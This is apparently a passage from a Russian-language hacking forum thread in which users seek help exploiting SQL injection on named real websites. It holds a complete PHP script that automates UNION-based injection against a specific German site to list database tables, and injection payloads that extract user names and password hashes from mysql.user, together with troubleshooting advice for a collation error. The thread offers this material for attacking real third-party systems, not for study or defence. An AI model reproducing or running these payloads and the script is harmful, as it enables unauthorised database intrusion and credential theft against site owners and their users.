С того, что оно у тебя стандартное - "Нету нормальной админки, нету шелла")

PS:

можно что-нибуть выжать или дохлый номер?
http://www.odz.com.ua/modules.php?name=music&d_op=last_music&pagenum='

Настройте пожалуйста скрипт.

[/PHP]<?php
set_time_limit(0);
$set['b']='121212';//Что находится перед выводиомй инфой
$set['e']='212121';//Что находится после выводимой инфы
$set['u']='http://www.engelmt.de/en/cataloque/artikelgruppen.php?id=';//URL с узвимым параметров В КОНЦЕ(!)
$set['z']='-91 union select 1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name) ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from+information_schema.tables LIMIT +++counter+++,1/*';//Уязвимый параметр
$set['c']='+++counter+++';//Строка счетчика
$set['f']='0';//Начальное значение счетчика
$set['s']='50';//Конечное значение счетчика
$set['h']='www.engelmt.de';//Хост

if(!empty($_GET['b']))$set['b']=$_GET['b'];
if(!empty($_GET['e']))$set['e']=$_GET['e'];
if(!empty($_GET['u']))$set['u']=$_GET['u'];
if(!empty($_GET['z']))$set['z']=$_GET['z'];
if(!empty($_GET['c']))$set['c']=$_GET['c'];
if(!empty($_GET['f']))$set['f']=$_GET['f'];
if(!empty($_GET['s']))$set['s']=$_GET['s'];
if(!empty($_GET['h']))$set['h']=$_GET['h'];

for($i=$set['f'];$i<=$set['s'];$i++)
{
$zapros=str_replace($set['c'],$i,$set['z']);//Изменияем счетчик в уязвимом параметре

//Создаем пакет
$header="GET ".$set['u'].urlencode($zapros)." HTTP/1.0\r\n";
$header.="Accept-Language: en-us,en;q=0.5\r\n";
$header.="Accept-Charset: utf-8,*;q=0.7\r\n";
$header.="Accept: text/html,image/jpeg,image/gif,text/xml,text/plain,image/png,*/*;q=0.5";
$header.="User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50\r\n";
$header.="Connection: keep-alive\r\n";
$header.="Cookie: PHPSESSID=028df047751bfc9a2ee18204eb2d5595\r\n";
$header.='Cookie2: $Version=1'."\r\n";
$header.="Host: ".$set['h']."\r\n\r\n";

$dt="";
$fp=fsockopen($set['h'], 80);
fwrite($fp, $header);
while(!feof($fp)) $dt.=fread($fp, 1024);
fclose($fp);

//Вырезаем необходимую инфу
$dt=substr($dt,strpos($dt,$set['b'])+strlen($set['b']));
$dt=substr($dt,0,strpos($dt,$set['e']));

//Выводим инфу на экран
echo($dt."\r\n");
flush();
}

?>

атрибут космический-

бруто технику описывали уже с минимальным количеством запросов

Подскажите,как бороьтся с такой ошибкой?
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (latin1_bin,IMPLICIT) for operation 'UNION'
Запрос
?id=-10256'+union+select+1,2,3,4,5,6,user,password,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7+from+mysql.user+limit+1,1/*

Прочтением статей мб?
https://forum.antichat.ru/thread104591.html
Вопрос №2

?id=-10256'+union+select+1,2,3,4,5,6,AES_DECRYPT(AES_EN CRYPT(user,password)),9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+mysql.user+limit+ 1,1/*

Спасибо! =)

И что, работает так?

Тебе тоже не мешает, кстати, статьи перечитать Ну или по синтаксису что-то